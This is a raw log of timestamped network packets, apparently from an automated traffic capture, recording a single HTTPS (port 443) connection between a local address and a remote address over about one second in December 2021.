                                                                                              Dec 14, 2021 00:57:16.813383102 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.813436985 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.813472986 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.813477993 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.813497066 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.813517094 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.813648939 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.813663006 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.813743114 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.813834906 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.813873053 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.813940048 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.813951969 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814028978 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.814042091 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814111948 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.814230919 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814273119 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814336061 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.814348936 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814435005 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.814445972 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814515114 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.814604998 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814641953 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814739943 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814743996 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.814759970 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.814836979 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.814981937 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.815033913 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.815110922 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.815124035 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.815180063 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.815222979 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.815236092 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.815303087 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.834427118 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.834469080 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.834542036 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.834602118 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.834620953 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.834640026 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.834682941 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.963558912 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.963610888 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.963735104 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.963767052 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.963872910 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.963885069 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.963907003 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.963947058 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.963969946 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.963982105 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964065075 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964133978 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964147091 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964196920 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964236021 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964241982 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964260101 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964298010 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964375019 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964385986 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964457989 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964596987 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964636087 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964694023 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964705944 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964765072 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964801073 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964812040 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.964900017 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.964983940 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965020895 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965076923 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965087891 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965147018 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965186119 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965197086 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965280056 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965394020 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965430975 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965487957 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965500116 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965560913 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965605021 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965615988 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965689898 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965815067 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965852976 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965909958 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.965922117 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.965975046 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.966012001 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.966022968 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.966115952 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.982687950 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.982738972 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.982795954 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.982810020 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:16.982851028 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:16.982863903 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.025934935 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.026035070 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.114296913 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.114324093 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.114393950 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.114511967 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.114548922 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.114573002 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.114638090 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.114681005 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.114711046 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.114770889 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.114841938 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.114866018 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.114955902 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.114964008 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.115128994 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.115149021 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.115206003 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.115251064 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.115267038 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.115324020 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.115362883 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.115613937 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.115637064 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.115683079 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.115793943 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.115808964 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.115880013 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.116059065 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.116080046 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.116127014 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.116175890 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.116190910 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.116241932 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.116278887 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.116534948 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.116555929 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.116610050 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.116652012 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.116664886 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.116724968 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.116770029 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.117080927 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.117100000 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.117150068 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.117197990 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.117213011 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.117270947 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.117301941 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.175008059 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.175029993 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.175153017 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.175173044 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.175219059 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.175364971 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.265670061 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.265700102 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.265806913 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.265873909 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.265913010 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266024113 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.266036987 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.266037941 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266061068 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266107082 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266113997 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.266130924 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266212940 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.266239882 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266311884 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.266459942 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266482115 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266520023 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266568899 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.266583920 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266685009 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.266906023 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266925097 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.266988039 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267003059 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.267024994 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267087936 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.267149925 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.267390013 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267410040 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267503023 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.267504930 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267525911 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267669916 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.267821074 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267841101 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267880917 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.267930031 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.267946005 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.268044949 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.268266916 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.268295050 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.268349886 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.268397093 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.268413067 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.268497944 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.367130995 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.367182970 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.367278099 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.367330074 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.367376089 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.367402077 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.367451906 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.416941881 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.416991949 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417097092 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.417128086 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417195082 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.417229891 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.417249918 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417275906 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417315960 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417360067 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.417375088 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417474031 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.417489052 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417584896 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.417614937 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417653084 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417746067 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.417753935 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417776108 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.417877913 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.418015003 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418051958 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418152094 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418193102 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.418206930 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418304920 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.418370008 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418409109 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418493032 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.418507099 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418603897 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.418617010 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418751955 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.418797970 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418834925 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418927908 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.418950081 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.418963909 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.419136047 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.419166088 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.419203043 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.419275045 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.419284105 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.419305086 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.419346094 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.419406891 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.557560921 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.557615995 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.557720900 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.557760954 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.557804108 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.557831049 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.557884932 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.567629099 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.567677975 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.567747116 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.567776918 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.567799091 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.567862988 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.567877054 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.567949057 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.567950964 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.567972898 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568022013 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568032026 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568063974 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568073988 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568106890 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568155050 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568166971 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568224907 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568337917 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568377972 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568419933 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568434000 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568461895 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568501949 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568511009 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568568945 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568733931 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568772078 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568816900 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568829060 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568866968 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568906069 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.568917036 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.568977118 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.569161892 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.569199085 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.569247961 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.569258928 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.569303989 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.569324017 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.569334030 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.569391966 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.569565058 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.569602966 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.569658041 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.569669962 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.569716930 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.569725990 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.569736004 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.569801092 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.575849056 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.575900078 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.575951099 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.575964928 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.575982094 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.576014996 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.576025963 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.576081991 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.705833912 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.705888987 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.705959082 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.705992937 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:17.706021070 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:17.706056118 CET49752443192.168.2.352.219.96.48
